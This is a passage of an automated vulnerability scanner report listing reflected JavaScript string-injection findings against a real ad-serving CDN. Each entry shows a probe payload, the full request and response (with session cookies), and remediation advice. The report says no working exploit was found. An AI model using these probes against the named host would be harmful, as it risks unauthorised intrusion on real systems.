var zzADS_CHAN = '203687986';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20119051;x=2124892286';df5245fe92e;c=203687986,203687986;i=0;n=203;s=9542;p=20830170;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://solutions.internet.com/3851_ITILv3-default" TARGET="_blank" onMouseOver="window.status=\'\';
...[SNIP]...

3.191. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff6c9'%3b8c6997a9eb5 was submitted in the REST URL parameter 7. This input was echoed as ff6c9';8c6997a9eb5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20119051/21248/0/0/203687986ff6c9'%3b8c6997a9eb5/203687986//0/203/9542//1/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1667
Cache-Control: max-age=2591954
Expires: Mon, 28 Mar 2011 01:48:56 GMT
Date: Sat, 26 Feb 2011 01:49:42 GMT
Connection: close


var zzADS_CHAN = '203687986ff6c9';8c6997a9eb5';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = zzPage_obj[zzADS_CHAN].zzTrd;

...[SNIP]...

3.192. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c72d0'%3bb81f0cdff45 was submitted in the REST URL parameter 8. This input was echoed as c72d0';b81f0cdff45 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20119051/21248/0/0/203687986/203687986c72d0'%3bb81f0cdff45//0/203/9542//1/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1649
Cache-Control: max-age=2591985
Expires: Mon, 28 Mar 2011 01:49:29 GMT
Date: Sat, 26 Feb 2011 01:49:44 GMT
Connection: close


var zzADS_CHAN = '203687986';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20119051;x=21248;c=203687986,203687986c72d0';b81f0cdff45;i=0;n=203;s=9542;p=20830170;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://solutions.internet.com/3851_ITILv3-default" TARGET="_blank" onMouseOver="window.status=\'\'; return true;" onMouseO
...[SNIP]...

3.193. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43d0c'%3b225d52bbf59 was submitted in the REST URL parameter 9. This input was echoed as 43d0c';225d52bbf59 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20119051/21248/0/0/203687986/203687986//043d0c'%3b225d52bbf59/203/9542//1/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1649
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:47 GMT
Date: Sat, 26 Feb 2011 01:49:47 GMT
Connection: close


var zzADS_CHAN = '203687986';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20119051;x=21248;c=203687986,203687986;i=043d0c';225d52bbf59;n=203;s=9542;p=20830170;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://solutions.internet.com/3851_ITILv3-default" TARGET="_blank" onMouseOver="window.status=\'\'; return true;" onMouseOut="
...[SNIP]...

3.194. http://e2.cdn.qnsr.com//cgi/k/20132865/1537/0/0/203687984/203687984//0/203/9542//1000002/i.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20132865/1537/0/0/203687984/203687984//0/203/9542//1000002/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5edfa'%3b1e8c5ab6679 was submitted in the REST URL parameter 7. This input was echoed as 5edfa';1e8c5ab6679 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20132865/1537/0/0/2036879845edfa'%3b1e8c5ab6679/203687984//0/203/9542//1000002/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1877
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:39 GMT
Date: Sat, 26 Feb 2011 01:49:39 GMT
Connection: close


var zzADS_CHAN = '2036879845edfa';1e8c5ab6679';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = zzPage_obj[zzADS_CHAN].zzTrd;

...[SNIP]...

3.195. http://e2.cdn.qnsr.com//cgi/k/20135122/1793/0/0/203687991/203687991//0/203/9542//5000005/i.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20135122/1793/0/0/203687991/203687991//0/203/9542//5000005/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4d45'%3b635acea8c54 was submitted in the REST URL parameter 7. This input was echoed as f4d45';635acea8c54 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20135122/1793/0/0/203687991f4d45'%3b635acea8c54/203687991//0/203/9542//5000005/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 6112
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:46 GMT
Date: Sat, 26 Feb 2011 01:49:46 GMT
Connection: close


var zzADS_CHAN = '203687991f4d45';635acea8c54';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = zzPage_obj[zzADS_CHAN].zzTrd;

...[SNIP]...

3.196. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 10]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2e4c'%3b75866eeb8cb was submitted in the REST URL parameter 10. This input was echoed as a2e4c';75866eeb8cb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585/0/0/203687989/203687989//0/203a2e4c'%3b75866eeb8cb/9542//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:53 GMT
Date: Sat, 26 Feb 2011 01:49:53 GMT
Connection: close


var zzADS_CHAN = '203687989';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
anguage=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0,0%3Bc=203687989,203687989%3Bi=0%3Bn=203a2e4c';75866eeb8cb%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.197. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 11]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 11 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ec13'%3bb82047b1192 was submitted in the REST URL parameter 11. This input was echoed as 5ec13';b82047b1192 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/95425ec13'%3bb82047b1192//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2591945
Expires: Mon, 28 Mar 2011 01:49:03 GMT
Date: Sat, 26 Feb 2011 01:49:58 GMT
Connection: close


var zzADS_CHAN = '203687989';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0,0%3Bc=203687989,203687989%3Bi=0%3Bn=203%3Bs=95425ec13';b82047b1192%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.198. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 585a1'%3b1941ee17325 was submitted in the REST URL parameter 4. This input was echoed as 585a1';1941ee17325 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585585a1'%3b1941ee17325/0/0/203687989/203687989//0/203/9542//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2591996
Expires: Mon, 28 Mar 2011 01:49:28 GMT
Date: Sat, 26 Feb 2011 01:49:32 GMT
Connection: close


var zzADS_CHAN = '203687989';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585585a1';1941ee17325%3Bg=0,0%3Bc=203687989,203687989%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.199. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fde13'%3b899c01c4079 was submitted in the REST URL parameter 5. This input was echoed as fde13';899c01c4079 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585/0fde13'%3b899c01c4079/0/203687989/203687989//0/203/9542//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2591982
Expires: Mon, 28 Mar 2011 01:49:17 GMT
Date: Sat, 26 Feb 2011 01:49:35 GMT
Connection: close


var zzADS_CHAN = '203687989';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0fde13';899c01c4079,0%3Bc=203687989,203687989%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.200. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9129'%3b96c2477c71d was submitted in the REST URL parameter 6. This input was echoed as a9129';96c2477c71d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585/0/0a9129'%3b96c2477c71d/203687989/203687989//0/203/9542//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2591947
Expires: Mon, 28 Mar 2011 01:48:46 GMT
Date: Sat, 26 Feb 2011 01:49:39 GMT
Connection: close


var zzADS_CHAN = '203687989';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
